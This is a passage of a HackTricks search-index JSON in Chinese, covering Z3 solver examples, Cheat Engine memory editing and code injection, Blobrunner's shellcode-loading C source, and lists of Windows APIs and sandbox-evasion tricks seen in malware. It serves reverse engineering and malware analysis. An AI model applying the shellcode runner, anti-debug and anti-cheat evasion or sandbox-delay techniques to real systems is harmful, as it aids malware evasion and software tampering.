integer coefficients. Internally, Z3 represents all these numbers precisely.)\\n#so you can get the decimals you need from the solution\\nr1 = Real(\'r1\')\\nr2 = Real(\'r2\')\\n#Solve the ecuation\\nprint(solve(r1**2 + r2**2 == 3, r1**3 == 2))\\n#Solve the ecuation with 30 decimals\\nset_option(precision=30)\\nprint(solve(r1**2 + r2**2 == 3, r1**3 == 2))","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 整数/简化/实数","id":"10003","title":"整数/简化/实数"},"10004":{"body":"python from z3 import * x, y, z = Reals(\'x y z\')\\ns = Solver()\\ns.add(x > 1, y > 1, x + y > 3, z - x < 10)\\ns.check() m = s.model()\\nprint (\\"x = %s\\" % m[x])\\nfor d in m.decls():\\nprint(\\"%s = %s\\" % (d.name(), m[d]))","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 打印模型","id":"10004","title":"打印模型"},"10005":{"body":"现代CPU和主流编程语言使用 固定大小位向量 进行算术运算。机器算术在Z3Py中作为 位向量 可用。 python from z3 import * x = BitVec(\'x\', 16) #Bit vector variable \\"x\\" of length 16 bit\\ny = BitVec(\'y\', 16) e = BitVecVal(10, 16) #Bit vector with value 10 of length 16bits\\na = BitVecVal(-1, 16)\\nb = BitVecVal(65535, 16)\\nprint(simplify(a == b)) #This is True!\\na = BitVecVal(-1, 32)\\nb = BitVecVal(65535, 32)\\nprint(simplify(a == b)) #This is False","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 机器算术","id":"10005","title":"机器算术"},"10006":{"body":"Z3 提供了特殊的有符号算术运算版本,在这里 位向量是被视为有符号还是无符号 是有区别的。在 Z3Py 中,运算符 <, <=, >, >=, /, % 和 >> 对应于 有符号 版本。相应的 无符号 运算符是 ULT, ULE, UGT, UGE, UDiv, URem 和 LShR. 
python from z3 import * # Create to bit-vectors of size 32\\nx, y = BitVecs(\'x y\', 32)\\nsolve(x + y == 2, x > 0, y > 0) # Bit-wise operators\\n# & bit-wise and\\n# | bit-wise or\\n# ~ bit-wise not\\nsolve(x & y == ~y)\\nsolve(x < 0) # using unsigned version of <\\nsolve(ULT(x, 0))","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 有符号/无符号数字","id":"10006","title":"有符号/无符号数字"},"10007":{"body":"解释函数 ,例如算术,其中 函数 + 具有 固定的标准解释 (它将两个数字相加)。 未解释函数 和常量是 最大灵活的 ;它们允许与函数或常量的 约束 一致的 任何解释 。 示例:将 f 应用两次于 x 结果再次得到 x,但将 f 应用一次于 x 则与 x 不同。 python from z3 import * x = Int(\'x\')\\ny = Int(\'y\')\\nf = Function(\'f\', IntSort(), IntSort())\\ns = Solver()\\ns.add(f(f(x)) == x, f(x) == y, x != y)\\ns.check()\\nm = s.model()\\nprint(\\"f(f(x)) =\\", m.evaluate(f(f(x))))\\nprint(\\"f(x) =\\", m.evaluate(f(x))) print(m.evaluate(f(2)))\\ns.add(f(x) == 4) #Find the value that generates 4 as response\\ns.check()\\nprint(m.model())","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 函数","id":"10007","title":"函数"},"10008":{"body":"","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 示例","id":"10008","title":"示例"},"10009":{"body":"python # 9x9 matrix of integer variables\\nX = [ [ Int(\\"x_%s_%s\\" % (i+1, j+1)) for j in range(9) ]\\nfor i in range(9) ] # each cell contains a value in {1, ..., 9}\\ncells_c = [ And(1 <= X[i][j], X[i][j] <= 9)\\nfor i in range(9) for j in range(9) ] # each row contains a digit at most once\\nrows_c = [ Distinct(X[i]) for i in range(9) ] # each column contains a digit at most once\\ncols_c = [ Distinct([ X[i][j] for i in range(9) ])\\nfor j in range(9) ] # each 3x3 square contains a digit at most once\\nsq_c = [ Distinct([ X[3*i0 + i][3*j0 + j]\\nfor i in range(3) for j in range(3) ])\\nfor i0 in range(3) for j0 in range(3) ] sudoku_c = cells_c + rows_c + cols_c + sq_c # sudoku instance, we use \'0\' for empty cells\\ninstance = 
((0,0,0,0,9,4,0,3,0),\\n(0,0,0,5,1,0,0,0,7),\\n(0,8,9,0,0,0,0,4,0),\\n(0,0,0,0,0,0,2,0,8),\\n(0,6,0,2,0,1,0,5,0),\\n(1,0,2,0,0,0,0,0,0),\\n(0,7,0,0,0,0,5,2,0),\\n(9,0,0,0,6,5,0,0,0),\\n(0,4,0,9,7,0,0,0,0)) instance_c = [ If(instance[i][j] == 0,\\nTrue,\\nX[i][j] == instance[i][j])\\nfor i in range(9) for j in range(9) ] s = Solver()\\ns.add(sudoku_c + instance_c)\\nif s.check() == sat:\\nm = s.model()\\nr = [ [ m.evaluate(X[i][j]) for j in range(9) ]\\nfor i in range(9) ]\\nprint_matrix(r)\\nelse:\\nprint \\"failed to solve\\"","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 数独求解器","id":"10009","title":"数独求解器"},"1001":{"body":"为了解决这个问题,混合服务或使用多个地址可以帮助模糊所有权。","breadcrumbs":"Blockchain & Crypto » 示例","id":"1001","title":"示例"},"10010":{"body":"https://ericpony.github.io/z3py-tutorial/guide-examples.htm tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 参考文献","id":"10010","title":"参考文献"},"10011":{"body":"Reading time: 16 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 Cheat Engine 是一个有用的程序,可以找到正在运行的游戏内重要值存储的位置并进行更改。 当你下载并运行它时,你会 看到 一个 教程 ,介绍如何使用该工具。如果你想学习如何使用该工具,强烈建议完成这个教程。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » Cheat Engine","id":"10011","title":"Cheat Engine"},"10012":{"body":"这个工具非常有用,可以找到 某个值 (通常是一个数字) 在程序内存中的存储位置 。 通常数字 以 4字节 形式存储,但你也可以找到 双精度 或 浮点 格式,或者你可能想寻找 不同于数字 的东西。因此,你需要确保 选择 你想要 搜索的内容 : 你还可以指示 不同 类型的 搜索 : 你还可以勾选框以 在扫描内存时停止游戏 :","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 你在搜索什么?","id":"10012","title":"你在搜索什么?"},"10013":{"body":"在 编辑 --> 设置 --> 热键 中,你可以为不同的目的设置不同的 热键 ,例如 停止 游戏 (如果你想在某个时刻扫描内存,这非常有用)。还有其他选项可用:","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 热键","id":"10013","title":"热键"},"10014":{"body":"一旦你 找到 你 寻找的值 的 位置 (更多内容在后面的步骤中),你可以通过双击它来 修改 ,然后双击它的值: 最后 勾选 以在内存中完成修改: 对 内存 的 更改 将立即 应用 (请注意,直到游戏不再使用此值,该值 不会在游戏中更新 )。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 修改值","id":"10014","title":"修改值"},"10015":{"body":"所以,我们假设有一个重要的值(比如你用户的生命值)你想要提高,并且你正在内存中寻找这个值)","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 搜索值","id":"10015","title":"搜索值"},"10016":{"body":"假设你在寻找值 100,你 执行扫描 搜索该值,并找到很多匹配项: 然后,你做一些事情使得 值发生变化 ,你 停止 游戏并 执行 下一次扫描 : Cheat Engine 将搜索 从 100 变为新值 的 值 。恭喜,你 找到了 你正在寻找的 值的地址 ,现在你可以修改它。 如果你仍然有多个值,做一些事情再次修改该值,并执行另一个“下一次扫描”以过滤地址。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 通过已知的变化","id":"10016","title":"通过已知的变化"},"10017":{"body":"在你 不知道值 但你知道 如何使其变化 (甚至变化的值)的情况下,你可以寻找你的数字。 所以,首先执行一种类型为“ 未知初始值 ”的扫描: 然后,使值发生变化,指示 值 如何变化 (在我的例子中是减少了 1),并执行 下一次扫描 : 你将看到 所有以所选方式修改的值 : 一旦你找到了你的值,你可以修改它。 请注意,有很多 可能的变化 ,你可以根据需要 多次执行这些步骤 以过滤结果:","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 未知值,已知变化","id":"10017","title":"未知值,已知变化"},"10018":{"body":"到目前为止,我们学习了如何找到存储值的地址,但在 游戏的不同执行中,该地址很可能位于内存的不同位置 。所以让我们找出如何始终找到该地址。 使用一些提到的技巧,找到当前游戏存储重要值的地址。然后(如果你愿意,可以停止游戏)右键单击找到的 地址 ,选择“ 查找访问此地址的内容 ”或“ 查找写入此地址的内容 ”: 第一个选项 有助于了解 代码 的 哪些部分 在 使用 这个 地址 (这对于更多事情很有用,比如 
知道你可以在哪里修改游戏的代码 )。 第二个选项 更加 具体 ,在这种情况下更有帮助,因为我们想知道 这个值是从哪里写入的 。 一旦你选择了其中一个选项, 调试器 将 附加 到程序,并且会出现一个新的 空窗口 。现在, 玩 游戏 并 修改 该 值 (无需重新启动游戏)。 窗口 应该会 填充 正在 修改 该 值 的 地址 : 现在你找到了修改值的地址,你可以 随意修改代码 (Cheat Engine 允许你快速将其修改为 NOP): 因此,你现在可以修改它,使得代码不会影响你的数字,或者总是以积极的方式影响它。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 随机内存地址 - 查找代码","id":"10018","title":"随机内存地址 - 查找代码"},"10019":{"body":"按照之前的步骤,找到你感兴趣的值。然后,使用“ 查找写入此地址的内容 ”找出哪个地址写入这个值,并双击它以获取反汇编视图: 然后,执行新的扫描 搜索“[]”之间的十六进制值 (在这种情况下是 $edx 的值): ( 如果出现多个,通常需要最小的地址 ) 现在,我们已经 找到了将修改我们感兴趣的值的指针 。 点击“ 手动添加地址 ”: 现在,勾选“指针”复选框,并在文本框中添加找到的地址(在这种情况下,前一张图片中找到的地址是 \\"Tutorial-i386.exe\\"+2426B0): (注意第一个“地址”是从你输入的指针地址自动填充的) 点击确定,一个新的指针将被创建: 现在,每次你修改该值时,你都在 修改重要值,即使值所在的内存地址不同。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 随机内存地址 - 查找指针","id":"10019","title":"随机内存地址 - 查找指针"},"1002":{"body":"用户有时在网上分享他们的比特币地址,使得 很容易将地址与其所有者关联 。","breadcrumbs":"Blockchain & Crypto » 社交网络与论坛曝光","id":"1002","title":"社交网络与论坛曝光"},"10020":{"body":"代码注入是一种技术,你将一段代码注入到目标进程中,然后重新引导代码的执行以通过你自己编写的代码(例如给你积分而不是减少它们)。 所以,想象一下你找到了一个地址,它正在从你的玩家生命中减去 1: 点击显示反汇编以获取 反汇编代码 。 然后,点击 CTRL+a 调用自动汇编窗口,并选择 模板 --> 代码注入 填写 你想要修改的指令的地址 (这通常是自动填充的): 将生成一个模板: 因此,将你的新汇编代码插入到“ newmem ”部分,并从“ originalcode ”中删除原始代码,如果你不想让它被执行。在这个例子中,注入的代码将增加 2 分而不是减少 1: 点击执行等,你的代码应该被注入到程序中,改变功能的行为!","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 代码注入","id":"10020","title":"代码注入"},"10021":{"body":"自 7.0 版本以来,Cheat Engine 继续发展,增加了几个生活质量和 进攻性逆向 功能,这些功能在分析现代软件(不仅仅是游戏!)时非常方便。以下是一个 非常简明的实用指南 ,介绍你在红队/CTF 工作中最有可能使用的新增功能。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » Cheat Engine 7.x 的高级功能(2023-2025)","id":"10021","title":"Cheat Engine 7.x 的高级功能(2023-2025)"},"10022":{"body":"指针必须以特定偏移量结束,新的 偏差 滑块(≥7.4)在更新后重新扫描时大大减少了误报。将其与多映射比较(.PTR → 与其他保存的指针映射比较 )结合使用,可以在短短几分钟内获得 单一的弹性基指针 。 批量过滤快捷键:在第一次扫描后,按 Ctrl+A → 空格 标记所有内容,然后按 Ctrl+I(反转)以取消选择未通过重新扫描的地址。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 指针扫描器 2 改进","id":"10022","title":"指针扫描器 2 
改进"},"10023":{"body":"*从 7.5 开始,旧的 Ultimap 在 Intel 处理器跟踪 (IPT) 的基础上重新实现。这意味着你现在可以记录目标采取的 每个 分支 而无需单步执行 (仅限用户模式,它不会触发大多数反调试小工具)。 Memory View → Tools → Ultimap 3 → check «Intel PT»\\nSelect number of buffers → Start 在几秒钟后停止捕获并 右键点击 → 将执行列表保存到文件 。结合分支地址和Find out what addresses this instruction accesses会话,可以极快地定位高频游戏逻辑热点。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » Ultimap 3 – Intel PT 跟踪","id":"10023","title":"Ultimap 3 – Intel PT 跟踪"},"10024":{"body":"版本7.5引入了一个 一字节 JMP 存根(0xEB),它安装了一个 SEH 处理程序并在原始位置放置了一个 INT3。当您在无法通过5字节相对跳转进行补丁的指令上使用 Auto Assembler → Template → Code Injection 时,它会自动生成。这使得在打包或大小受限的例程中实现“紧凑”钩子成为可能。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 1字节 jmp / 自动补丁模板","id":"10024","title":"1字节 jmp / 自动补丁模板"},"10025":{"body":"DBVM 是 CE 内置的 Type-2 虚拟机监控器。最近的构建终于添加了 AMD-V/SVM 支持 ,因此您可以在 Ryzen/EPYC 主机上运行Driver → Load DBVM。DBVM 允许您: 创建对 Ring-3/反调试检查不可见的硬件断点。 即使用户模式驱动程序被禁用,也可以读写可分页或受保护的内核内存区域。 执行无 VM-EXIT 的计时攻击绕过(例如,从虚拟机监控器查询rdtsc)。 提示: 当 Windows 11 上启用 HVCI/内存完整性时,DBVM 将拒绝加载 → 关闭它或启动一个专用的 VM 主机。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 使用 DBVM(AMD 和 Intel)进行内核级隐身","id":"10025","title":"使用 DBVM(AMD 和 Intel)进行内核级隐身"},"10026":{"body":"CE 现在提供了 ceserver 的完整重写,并可以通过 TCP 附加到 Linux、Android、macOS 和 iOS 目标。一个流行的分支集成了 Frida ,将动态插桩与 CE 的 GUI 结合起来 – 当您需要修补在手机上运行的 Unity 或 Unreal 游戏时,这非常理想: # on the target (arm64)\\n./ceserver_arm64 &\\n# on the analyst workstation\\nadb forward tcp:52736 tcp:52736 # (or ssh tunnel)\\nCheat Engine → \\"Network\\" icon → Host = localhost → Connect 对于 Frida 桥,请参见 bb33bb/frida-ceserver 在 GitHub 上。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 使用 ceserver 进行远程/跨平台调试","id":"10026","title":"使用 ceserver 进行远程/跨平台调试"},"10027":{"body":"Patch Scanner (MemView → Tools) – 检测可执行部分中意外的代码更改;对恶意软件分析很有用。 Structure Dissector 2 – 拖动地址 → Ctrl+D,然后 Guess fields 自动评估 C 结构。 .NET & Mono Dissector – 改进的 Unity 游戏支持;直接从 CE Lua 控制台调用方法。 Big-Endian 自定义类型 – 反向字节顺序扫描/编辑(对控制台模拟器和网络数据包缓冲区有用)。 
Autosave & tabs 用于 AutoAssembler/Lua 窗口,以及 reassemble() 用于多行指令重写。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 其他值得注意的工具","id":"10027","title":"其他值得注意的工具"},"10028":{"body":"官方安装程序带有 InnoSetup 广告推荐 (RAV 等)。 始终点击 Decline 或从源代码编译 以避免 PUP。AV 仍会将 cheatengine.exe 标记为 HackTool ,这是预期的。 现代反作弊驱动程序(EAC/Battleye, ACE-BASE.sys, mhyprot2.sys)即使在重命名后也会检测 CE 的窗口类。请在 一次性虚拟机 内运行您的反向工程副本,或在禁用网络游戏后运行。 如果您只需要用户模式访问,请选择 Settings → Extra → Kernel mode debug = off 以避免加载可能在 Windows 11 24H2 Secure-Boot 上导致 BSOD 的 CE 未签名驱动程序。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 安装与 OPSEC 注意事项 (2024-2025)","id":"10028","title":"安装与 OPSEC 注意事项 (2024-2025)"},"10029":{"body":"Cheat Engine 7.5 release notes (GitHub) frida-ceserver cross-platform bridge Cheat Engine 教程,完成它以学习如何开始使用 Cheat Engine tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 参考文献","id":"10029","title":"参考文献"},"1003":{"body":"交易可以被可视化为图形,揭示基于资金流动的用户之间的潜在连接。","breadcrumbs":"Blockchain & Crypto » 交易图分析","id":"1003","title":"交易图分析"},"10030":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 从 原始代码 中唯一修改的行是第10行。为了编译它,只需 在Visual Studio Code中创建一个C/C++项目,复制并粘贴代码并构建它 。 c #include \\n#include \\n#include #ifdef _WIN64\\n#include \\n#endif // Define bool\\n#pragma warning(disable:4996)\\n#define true 1\\n#define false 0 const char* _version = \\"0.0.5\\"; const char* _banner = \\" __________.__ ___. __________\\\\n\\"\\n\\" \\\\\\\\______ \\\\\\\\ | ____\\\\\\\\_ |__\\\\\\\\______ \\\\\\\\__ __ ____ ____ ___________ \\\\n\\"\\n\\" | | _/ | / _ \\\\\\\\| __ \\\\\\\\| _/ | \\\\\\\\/ \\\\\\\\ / \\\\\\\\_/ __ \\\\\\\\_ __ \\\\\\\\ \\\\n\\"\\n\\" | | \\\\\\\\ |_( <_> ) \\\\\\\\_\\\\\\\\ \\\\\\\\ | \\\\\\\\ | / | \\\\\\\\ | \\\\\\\\ ___/| | \\\\\\\\/ \\\\n\\"\\n\\" |______ /____/\\\\\\\\____/|___ /____|_ /____/|___| /___| /\\\\\\\\___ >__| \\\\n\\"\\n\\" \\\\\\\\/ \\\\\\\\/ \\\\\\\\/ \\\\\\\\/ \\\\\\\\/ \\\\\\\\/ \\\\n\\\\n\\"\\n\\" %s \\\\n\\\\n\\"; void banner() {\\nsystem(\\"cls\\");\\nprintf(_banner, _version);\\nreturn;\\n} LPVOID process_file(char* inputfile_name, bool jit, int offset, bool debug) {\\nLPVOID lpvBase;\\nFILE* file;\\nunsigned long fileLen;\\nchar* buffer;\\nDWORD dummy; file = fopen(inputfile_name, \\"rb\\"); if (!file) {\\nprintf(\\" [!] 
Error: Unable to open %s\\\\n\\", inputfile_name); return (LPVOID)NULL;\\n} printf(\\" [*] Reading file...\\\\n\\");\\nfseek(file, 0, SEEK_END);\\nfileLen = ftell(file); //Get Length printf(\\" [*] File Size: 0x%04x\\\\n\\", fileLen);\\nfseek(file, 0, SEEK_SET); //Reset fileLen += 1; buffer = (char*)malloc(fileLen); //Create Buffer\\nfread(buffer, fileLen, 1, file);\\nfclose(file); printf(\\" [*] Allocating Memory...\\"); lpvBase = VirtualAlloc(NULL, fileLen, 0x3000, 0x40); printf(\\".Allocated!\\\\n\\");\\nprintf(\\" [*] |-Base: 0x%08x\\\\n\\", (int)(size_t)lpvBase);\\nprintf(\\" [*] Copying input data...\\\\n\\"); CopyMemory(lpvBase, buffer, fileLen);\\nreturn lpvBase;\\n} void execute(LPVOID base, int offset, bool nopause, bool jit, bool debug)\\n{\\nLPVOID shell_entry; #ifdef _WIN64\\nDWORD thread_id;\\nHANDLE thread_handle;\\nconst char msg[] = \\" [*] Navigate to the Thread Entry and set a breakpoint. Then press any key to resume the thread.\\\\n\\";\\n#else\\nconst char msg[] = \\" [*] Navigate to the EP and set a breakpoint. Then press any key to jump to the shellcode.\\\\n\\";\\n#endif shell_entry = (LPVOID)((UINT_PTR)base + offset); #ifdef _WIN64 printf(\\" [*] Creating Suspended Thread...\\\\n\\");\\nthread_handle = CreateThread(\\nNULL, // Attributes\\n0, // Stack size (Default)\\nshell_entry, // Thread EP\\nNULL, // Arguments\\n0x4, // Create Suspended\\n&thread_id); // Thread identifier if (thread_handle == NULL) {\\nprintf(\\" [!] 
Error Creating thread...\\");\\nreturn;\\n}\\nprintf(\\" [*] Created Thread: [%d]\\\\n\\", thread_id);\\nprintf(\\" [*] Thread Entry: 0x%016x\\\\n\\", (int)(size_t)shell_entry); #endif if (nopause == false) {\\nprintf(\\"%s\\", msg);\\ngetchar();\\n}\\nelse\\n{\\nif (jit == true) {\\n// Force an exception by making the first byte not executable.\\n// This will cause\\nDWORD oldp; printf(\\" [*] Removing EXECUTE access to trigger exception...\\\\n\\"); VirtualProtect(shell_entry, 1 , PAGE_READWRITE, &oldp);\\n}\\n} #ifdef _WIN64\\nprintf(\\" [*] Resuming Thread..\\\\n\\");\\nResumeThread(thread_handle);\\n#else\\nprintf(\\" [*] Entry: 0x%08x\\\\n\\", (int)(size_t)shell_entry);\\nprintf(\\" [*] Jumping to shellcode\\\\n\\");\\n__asm jmp shell_entry;\\n#endif\\n} void print_help() {\\nprintf(\\" [!] Error: No file!\\\\n\\\\n\\");\\nprintf(\\" Required args: \\\\n\\\\n\\");\\nprintf(\\" Optional Args:\\\\n\\");\\nprintf(\\" --offset The offset to jump into.\\\\n\\");\\nprintf(\\" --nopause Don\'t pause before jumping to shellcode. Danger!!! 
\\\\n\\");\\nprintf(\\" --jit Forces an exception by removing the EXECUTE permission from the alloacted memory.\\\\n\\");\\nprintf(\\" --debug Verbose logging.\\\\n\\");\\nprintf(\\" --version Print version and exit.\\\\n\\\\n\\");\\n} int main(int argc, char* argv[])\\n{\\nLPVOID base;\\nint i;\\nint offset = 0;\\nbool nopause = false;\\nbool debug = false;\\nbool jit = false;\\nchar* nptr; banner(); if (argc < 2) {\\nprint_help();\\nreturn -1;\\n} printf(\\" [*] Using file: %s \\\\n\\", argv[1]); for (i = 2; i < argc; i++) {\\nif (strcmp(argv[i], \\"--offset\\") == 0) {\\nprintf(\\" [*] Parsing offset...\\\\n\\");\\ni = i + 1;\\nif (strncmp(argv[i], \\"0x\\", 2) == 0) {\\noffset = strtol(argv[i], &nptr, 16);\\n}\\nelse {\\noffset = strtol(argv[i], &nptr, 10);\\n}\\n}\\nelse if (strcmp(argv[i], \\"--nopause\\") == 0) {\\nnopause = true;\\n}\\nelse if (strcmp(argv[i], \\"--jit\\") == 0) {\\njit = true;\\nnopause = true;\\n}\\nelse if (strcmp(argv[i], \\"--debug\\") == 0) {\\ndebug = true;\\n}\\nelse if (strcmp(argv[i], \\"--version\\") == 0) {\\nprintf(\\"Version: %s\\", _version);\\n}\\nelse {\\nprintf(\\"[!] Warning: Unknown arg: %s\\\\n\\", argv[i]);\\n}\\n} base = process_file(argv[1], jit, offset, debug);\\nif (base == NULL) {\\nprintf(\\" [!] Exiting...\\");\\nreturn -1;\\n}\\nprintf(\\" [*] Using offset: 0x%08x\\\\n\\", offset);\\nexecute(base, offset, nopause, jit, debug);\\nprintf(\\"Pausing - Press any key to quit.\\\\n\\");\\ngetchar();\\nreturn 0;\\n} tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reversing Tools & Basic Methods » Blobrunner","id":"10030","title":"Reversing Tools & Basic Methods"},"10031":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Common API used in Malware » 常见 API 在 Malware 中使用","id":"10031","title":"常见 API 在 Malware 中使用"},"10032":{"body":"","breadcrumbs":"Common API used in Malware » 通用","id":"10032","title":"通用"},"10033":{"body":"原始 Sockets WinAPI Sockets socket() WSAStratup() bind() bind() listen() listen() accept() accept() connect() connect() read()/recv() recv() write() send() shutdown() WSACleanup()","breadcrumbs":"Common API used in Malware » 网络","id":"10033","title":"网络"},"10034":{"body":"Many loaders wrap their TCP stream in SslStream 并将服务器的 leaf certificate 与嵌入的副本进行 pin(certificate pinning)。Bot info/tasks 会被压缩(例如,GZip)。当响应超过阈值(约 ~1 MB)时,数据会被分片为小块(例如 16 KB 段),以避免基于大小的启发式检测并减少反序列化期间的内存峰值。","breadcrumbs":"Common API used in Malware » TLS pinning and chunked transport","id":"10034","title":"TLS pinning and chunked transport"},"10035":{"body":"注册表 文件 服务 RegCreateKeyEx() GetTempPath() OpenSCManager RegOpenKeyEx() CopyFile() CreateService() RegSetValueEx() CreateFile() StartServiceCtrlDispatcher() RegDeleteKeyEx() WriteFile() RegGetValue() ReadFile()","breadcrumbs":"Common API used in Malware » 持久化","id":"10035","title":"持久化"},"10036":{"body":"名称 WinCrypt CryptAcquireContext() CryptGenKey() CryptDeriveKey() CryptDecrypt() CryptReleaseContext()","breadcrumbs":"Common API used in Malware » 加密","id":"10036","title":"加密"},"10037":{"body":"函数名 汇编指令 IsDebuggerPresent() CPUID() GetSystemInfo() IN() GlobalMemoryStatusEx() 
GetVersion() CreateToolhelp32Snapshot [Check if a process is running] CreateFileW/A [Check if a file exist]","breadcrumbs":"Common API used in Malware » 反分析/VM","id":"10037","title":"反分析/VM"},"10038":{"body":"Malware 经常通过搜索 Defender 的虚拟化导出(见 Malware Protection Emulator)来指纹化 sandbox emulators。如果检测到这些符号中的任何一个(对进程进行大小写不敏感的扫描),执行会被延迟 10–30 分钟并重新检查,以浪费分析时间。 作为检测用的 API 名称示例: MpVmp32Entry, MpVmp32FastEnter, MpCallPreEntryPointCode, MpCallPostEntryPointCode, MpFinalize, MpReportEvent*, MpSwitchToNextThread* VFS_* 系列:VFS_Open, VFS_Read, VFS_MapViewOfFile, VFS_UnmapViewOfFile, VFS_FindFirstFile/FindNextFile, VFS_CopyFile, VFS_DeleteFile, VFS_MoveFile ThrdMgr_*: ThrdMgr_GetCurrentThreadHandle, ThrdMgr_SaveTEB, ThrdMgr_SwitchThreads 典型的延迟原语(用户态): cmd cmd /c timeout /t %RANDOM_IN_[600,1800]% > nul Argument gatekeeping 操作员有时要求在运行 payload 之前存在一个看起来无害的 CLI 开关(例如 /i:--type=renderer 用于模拟 Chromium 子进程)。如果缺少该开关,loader 会立即退出,从而阻止简单的沙箱执行。","breadcrumbs":"Common API used in Malware » Emulator API fingerprinting & sleep evasion","id":"10038","title":"Emulator API fingerprinting & sleep evasion"},"10039":{"body":"Name VirtualAlloc 分配内存 (packers) VirtualProtect 更改内存权限 (packer giving execution permission to a section) ReadProcessMemory 注入到外部进程 WriteProcessMemoryA/W 注入到外部进程 NtWriteVirtualMemory CreateRemoteThread DLL/Process injection... 
NtUnmapViewOfSection QueueUserAPC CreateProcessInternalA/W","breadcrumbs":"Common API used in Malware » Stealth","id":"10039","title":"Stealth"},"1004":{"body":"该启发式基于分析具有多个输入和输出的交易,以猜测哪个输出是返回给发送者的找零。","breadcrumbs":"Blockchain & Crypto » 不必要输入启发式(最优找零启发式)","id":"1004","title":"不必要输入启发式(最优找零启发式)"},"10040":{"body":"Function Name CreateProcessA/W ShellExecute WinExec ResumeThread NtResumeThread","breadcrumbs":"Common API used in Malware » Execution","id":"10040","title":"Execution"},"10041":{"body":"GetAsyncKeyState() -- 按键记录 SetWindowsHookEx -- 按键记录 GetForeGroundWindow -- 获取运行窗口名称(或浏览器中的网站) LoadLibrary() -- 导入库 GetProcAddress() -- 导入库 CreateToolhelp32Snapshot() -- 列出运行中的进程 GetDC() -- 截图 BitBlt() -- 截图 InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetWriteFile() -- 访问互联网 FindResource(), LoadResource(), LockResource() -- 访问可执行文件的资源","breadcrumbs":"Common API used in Malware » 